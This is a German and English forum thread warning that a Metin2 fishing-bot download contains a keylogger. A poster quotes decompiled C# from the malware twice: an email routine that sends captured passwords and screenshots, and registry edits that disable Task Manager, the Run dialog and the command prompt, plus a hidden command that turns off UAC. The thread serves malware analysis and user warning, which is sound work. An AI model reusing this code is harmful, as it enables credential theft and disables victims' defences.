Private Server FishBot [Background/Fish On Earth]

[Shannou06]

Piep!

[Veroy]

schaut nicht so schlecht aus, mal gucken, was andre so sagen... spiele nämlich kein pserver

[Shannou06]

Danke

[Slait]

SCHLIMMER VIRUS!!!!

Die Datei [UG]SharkLoc.exe scheint OK zu sein, aber

beim ausführen der Datei SharkLoc patch.exe passiert so einiges.

1. Sendet eine E-Mail mit eurem Passwort (bekommen per GetAsyncKeyState) und nem Schreenshot von Metin2 mit den Accdaten an die Adresse .

Also ist es schonmal ein Keylogger der nen Screenshot sowie euer Passwort versendet.

Hier der Code:

 Spoiler

public static string SendEmail(ref string SMTP, ref string Froma, ref string Password, ref string Recipient, ref string Subject, ref string Body, ref int Port, [Optional, DefaultParameterValue(false)] ref bool TakePic)
{
Recipient = "";

string str;
try
{
MailMessage message = new MailMessage();
message.From = new MailAddress(Froma);
message.To.Add(Recipient);
message.Subject = Subject;
message.Body = Body;
SmtpClient client = new SmtpClient(SMTP);
string str2 = @"\" + LT;
if (TakePic)
{

//Screenshotcode wegen nacharmern ausgeblendet

}
Attachment item = new Attachment(Path.GetTempPath() + str2 + ".gif");
message.Attachments.Add(item);
}
client.Port = Port;
client.EnableSsl = true;
client.Credentials = new NetworkCredential(Froma, Password);
client.Send(message);
if (TakeScrns)
{
File.Delete(Path.GetTempPath() + str2 + ".gif");
}
str = "Email information is valid and working!";
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
str = "Email information invalid: " + exception.Message;
ProjectData.ClearProjectError();
}
return str;
}

2. Er verändert Werte in der Registry, z.B. damit euer Task-Manager nicht mehr funktioniert

So sieht das aus:

 Spoiler

if (wICUDZJUa == 2)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System ", "DisableTaskMgr", "1");
}
if (VGyGkxwN)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoRun", "1");
}
if (UWrUYmwR)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoViewContextMenu", "1");
}
if (KcOSrSdX)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
if (EUjFsCZUx)
{
Interaction.Shell(@"C:\Windows\System32\KcOSrSdX.e xe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
}
if (foytXmFZ)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}

und kopiert sich Dabei selber in den Autostart also ist immer aufm Rechner drauf!



SCHLIMMER VIRUS NICHT DOWNLOADEN!!!!!!!!

[Veroy]

wieder mal super arbeit slait
warum müssen einige eig. immer son scheiß verbreiten? -.-

[Shannou06]

Does that mean I have been infected?

[Veroy]

Quote:

Originally Posted by Shannou06

Does that mean I have been infected?

nein, dass heißt, dass du ein virenverbreiter bist

[MrCrackR]

Quote:

Originally Posted by Veroy

wieder mal super arbeit slait
warum müssen einige eig. immer son scheiß verbreiten? -.-

durch nen decompiler laufen zu lasse nist auch keine große kunst

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it

[Slait]

The File SharkLoc patch.exe is a Virus!!!

It sends an E-Mail with your Account-data to the mailaddress .

If you executed this file, your accountdata was send to the mail.
So your account will get hacked.

@MrCrackR
Du kannst die Datei ja nächstes Mal analysieren, anders kann man das eben nicht machen

[Veroy]

Quote:

Originally Posted by MrCrackR

durch nen decompiler laufen zu lasse nist auch keine große kunst

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it

er nimmt sich eben die zeit dafür, die leute hier zu warnen... warum machst dus denn nicht? jaja... nur am kritisieren immer

[MrCrackR]

Quote:

Originally Posted by Slait

@MrCrackR
Du kannst die Datei ja nächstes Mal analysieren, anders kann man das eben nicht machen

nur mal so, egal wie edel deine absichten sind, decompilen ist rechtlich verboten,
egal was das für ein programm ist. natürlich ganz nett von dir, das alles auf dich zu nehmen ^^.
aber es geht auch ohne decompilen, dauert nur länger. dafür brauchst du eine VM,
einen API-Monitor, einen Registry-Monitor und einen Sniffer.
wie gesagt, der zeitaufwand ist enorm, aber an dieser methode finde ich nichts illegales.

[Shannou06]

Quote:

Originally Posted by Slait

SCHLIMMER VIRUS!!!!

Die Datei [UG]SharkLoc.exe scheint OK zu sein, aber

beim ausführen der Datei SharkLoc patch.exe passiert so einiges.

1. Sendet eine E-Mail mit eurem Passwort (bekommen per GetAsyncKeyState) und nem Schreenshot von Metin2 mit den Accdaten an die Adresse .

Also ist es schonmal ein Keylogger der nen Screenshot sowie euer Passwort versendet.

Hier der Code:

 Spoiler

public static string SendEmail(ref string SMTP, ref string Froma, ref string Password, ref string Recipient, ref string Subject, ref string Body, ref int Port, [Optional, DefaultParameterValue(false)] ref bool TakePic)
{
Recipient = "";

string str;
try
{
MailMessage message = new MailMessage();
message.From = new MailAddress(Froma);
message.To.Add(Recipient);
message.Subject = Subject;
message.Body = Body;
SmtpClient client = new SmtpClient(SMTP);
string str2 = @"\" + LT;
if (TakePic)
{

//Screenshotcode wegen nacharmern ausgeblendet

}
Attachment item = new Attachment(Path.GetTempPath() + str2 + ".gif");
message.Attachments.Add(item);
}
client.Port = Port;
client.EnableSsl = true;
client.Credentials = new NetworkCredential(Froma, Password);
client.Send(message);
if (TakeScrns)
{
File.Delete(Path.GetTempPath() + str2 + ".gif");
}
str = "Email information is valid and working!";
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
str = "Email information invalid: " + exception.Message;
ProjectData.ClearProjectError();
}
return str;
}

2. Er verändert Werte in der Registry, z.B. damit euer Task-Manager nicht mehr funktioniert

So sieht das aus:

 Spoiler

if (wICUDZJUa == 2)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System ", "DisableTaskMgr", "1");
}
if (VGyGkxwN)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoRun", "1");
}
if (UWrUYmwR)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\Explorer", "NoViewContextMenu", "1");
}
if (KcOSrSdX)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}
if (EUjFsCZUx)
{
Interaction.Shell(@"C:\Windows\System32\KcOSrSdX.e xe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
}
if (foytXmFZ)
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "2");
}

und kopiert sich Dabei selber in den Autostart also ist immer aufm Rechner drauf!



SCHLIMMER VIRUS NICHT DOWNLOADEN!!!!!!!!

Quote:

Originally Posted by MrCrackR

durch nen decompiler laufen zu lasse nist auch keine große kunst

@Shannou: why are you writting that this FishBot is a virus but not removing the link to it

I want to be sure, otherwise I will loose the links. Who is stupid enough to click on a link saying "this a probably a virus!"

So is it sure?

[Slait]

@MrCrackR
Naja, wenn du wüsstest, wie viele illegale Sachen hier gemacht werden ^^
Da ist das acht das sowirklich vernachlässigbar, außerdem ist Viren verbreiten etwa nicht verboten??.
Fast jeder, der einen Bot analysiert, macht das so.

Aber die andere Methode, indem man alles überwacht habe ich noch nie probiert, wäre nützlich bei verschlüsselten Dateien, danke

@shannou06
It is sure, I decompiled it and there you can see the harmful code

[Shannou06]

In all the files or only in the patch?
So I know if I have to take away only one file!

[Slait]

The patch is a bad virus.

And the other is useless because you need an injector.

So remove everything.